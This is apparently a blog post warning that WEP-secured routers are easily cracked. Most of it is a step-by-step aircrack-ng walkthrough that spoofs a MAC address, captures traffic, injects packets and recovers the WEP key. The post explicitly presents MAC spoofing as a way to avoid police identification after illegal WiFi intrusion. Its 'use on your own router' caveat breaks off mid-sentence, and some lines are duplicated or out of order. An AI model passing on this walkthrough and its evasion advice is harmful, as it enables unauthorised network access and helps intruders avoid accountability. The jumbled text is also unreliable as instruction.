Have you noticed your internet speeds declining, is your WiFi light flashing with a large amount of activity when no ones using it? Your router may have been hacked. If you are using WEP encryption, you are virtually defenseless against attacks. Unfoutunately, some ISP's still give out routers, that only have WEP!
then you spoof your MAC address
Replace ROUTERSBSSID with the routers mac address, wlan0 with the wifi card name
If your router does not allow for other encryption, (wpa, wpa2) then there is even more sad news, your router could most likely be hacked in minutes. If you have a router like this, BUY A NEW ONE. I wouldn't say that if I really didn't mean it. A new Cisco router may go for 50 dollars, but you will be that much more secure. To put though, how easy it is to hack a WEP encryption, I will go ahead and demonstrate.
Now one tool used often by hackers is an Operating System called Backtrack. The pluses about it are that 1, you don't have to reinstall your operating system, as it can run live off the CD, and 2, it has almost all drivers for WiFi cards built in, no needing to install anything, just put the CD in and run it!
The first step that a hacker would take would be to "spoof" his MAC address. A MAC address is a HEX number (meaning it can use the numbers 0-9 and A-F) that is unique to your wifi card. When you spoof it, you are acually making any router, or computer think your mac is whatever you want it to be. Your MAC could actually be A5:44:3D:0F:DD, but if you spoofed it, you could make it, say: 00:11:22:33:44:55 What is the reasoning behind this? Lets say, the wifi hacker forgot to spoof his MAC. If the police were to come knocking at his door, and had a warrent against his/her computer, they could easily identify their mac address by looking at the card. WiFi hacking is illegal, so you could easily press charges against the hacker. A spoofed MAC, though would not match up with the actual one, so noone would know "whodunnit." Remeber though, the information below is to be used on YOUR OWN ROUTER TO SEE IF
To spoof your MAC address in BackTrack, you would use the following commands
First find out what your WiFi Card name is with the console:
airmon-ng
A list of wireless interfaces will come up. Mine is named wlan0, so from now on, replace wlan0 with your wireless cards name
Now lets shut down all interfaces with the wireless card:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55
Then turn the airmoniter back on
airmon-ng start wlan0
Now you may begin searching for your router. use the command
airodump-ng wlan0
A screen like this should come up:
Find your routers BSSID (e.g mac address) and copy it. Also look at your routers channel
Now use the following command to begin collecting data:
airodump-ng -c channel -w filename --bssid MAC wlan0
Replace channel with your routers channel number, filename with a filename for your data, MAC with the routers BSSID/MAC address and wlan0 with your wifi cards name.
Ok, so in this screen you should notice somewhere that it says #data and below a number. This is a rough estimate of how much data packets you have collected, with IV's. IVs will help you decode the password!
Now lets open another console and use the command
aireplay-ng -1 0 -a ROUTERSBSSID -h 00:11:22:33:44:55 wlan0
When successfull, you will get a screen like this:
Replace ROUTERSBSSID with the routers mac address, wlan0 with the wifi card name
now do one more aireplay command
aireplay-ng -3 -b ROUTERSBSSID -h 00:11:22:33:44:55 wlan0
Replace just like the command above.
When done successfully, you will have a screen like this and your #Data column will raise fast.
Ok, now time for the final step! Acutally cracking the password. When you get enough #Data (you should gain at least 10000 IVs) you may then stop the aireplay console by selecting that console and pressing CTRL C Now open a new console and type in the last command:
aircrack-ng filename-01.cap
Remember that filename you gave the airodump-ng command? use that as the filename, and yes you do need the -01.cap at the end! It will begin cracking, if it does not work, it will say something like, "Failed. Next try with 15000 IVs." redo the aireplay-ng steps again untill you get that much #Data. When it successfully cracks it, it should show a screen like:
This means your router is unsafe, and you need to change to a WPA/WPA2 password. As stated before, if your router does not have this setting, BUY A NEW ONE... Unless, you dont mind, giving anyone around you access to your internet connection. This may seem long, but if done by someone with experience, it can be done in less than 5 minutes!
Remember, use WPA/WPA2 and stay safe everyone.
No comments:
Post a Comment